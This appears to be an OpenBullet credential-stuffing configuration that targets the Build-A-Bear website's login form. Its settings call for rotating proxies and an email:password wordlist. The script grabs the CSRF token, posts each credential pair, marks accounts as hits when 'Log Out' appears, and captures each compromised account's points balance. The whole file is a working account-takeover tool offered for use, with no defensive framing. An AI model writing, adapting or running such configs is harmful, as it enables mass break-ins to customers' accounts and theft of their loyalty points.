[SETTINGS]
{
  "Name": "buildabearbb",
  "SuggestedBots": 1,
  "LastModified": "2018-08-26T15:20:10.9745495+00:00",
  "AdditionalInfo": "",
  "Author": "leehzet",
  "Version": "1.0.0",
  "NeedsProxies": true,
  "OnlySocks": false,
  "OnlySsl": false,
  "MaxProxyUses": 0,
  "AllowedWordlist1": "MailPass",
  "AllowedWordlist2": "None",
  "DataRules": [],
  "CustomInputs": [],
  "ForceHeadless": false,
  "AlwaysOpen": false,
  "AlwaysQuit": false,
  "DisableNotifications": false,
  "CustomUserAgent": "",
  "RandomUA": false,
  "CustomCMDArgs": ""
}
[SCRIPT]
REQUEST GET "https://www.buildabear.com/on/demandware.store/Sites-buildabear-us-Site/default/Login-LoginForm?scope=" AutoRedirect=TRUE 
  CONTENT "" 
  CONTENTTYPE "application/x-www-form-urlencoded" 
  HEADER "Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8" 
  HEADER "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/65.0.3325.181 Safari/537.36" 
  HEADER "Pragma: no-cache" 
  HEADER "Referer: https://www.buildabear.com/login?original=%2Fon%2Fdemandware.store%2FSites-buildabear-us-Site%2Fdefault%2FAccount-Show" 
PARSE "<SOURCE>" CSS "[name=csrf_token]" "value" 0 -> VAR "token" "" "" 
REQUEST POST "https://www.buildabear.com/on/demandware.store/Sites-buildabear-us-Site/default/Login-LoginForm?scope=" AutoRedirect=TRUE 
  CONTENT "dwfrm_login_username=<USER>&dwfrm_login_password=<PASS>&dwfrm_login_login=Login&csrf_token=<token>" 
  CONTENTTYPE "application/x-www-form-urlencoded" 
  HEADER "Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8" 
  HEADER "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/65.0.3325.181 Safari/537.36" 
  HEADER "Pragma: no-cache" 
  HEADER "Referer: https://www.buildabear.com/login?original=%2Fon%2Fdemandware.store%2FSites-buildabear-us-Site%2Fdefault%2FAccount-Show" 
KEYCHECK BanOn4XX=FALSE BanOnToCheck=TRUE 
  KEYCHAIN Failure OR 
    KEY ">Sorry, this does not match our records." 
  KEYCHAIN Success OR 
    KEY "\">Log Out</" 
PARSE "<SOURCE>" LR "<span class=\"points-value\">" "</span>" Recursive=FALSE -> CAP "Points Balance" "" "" 
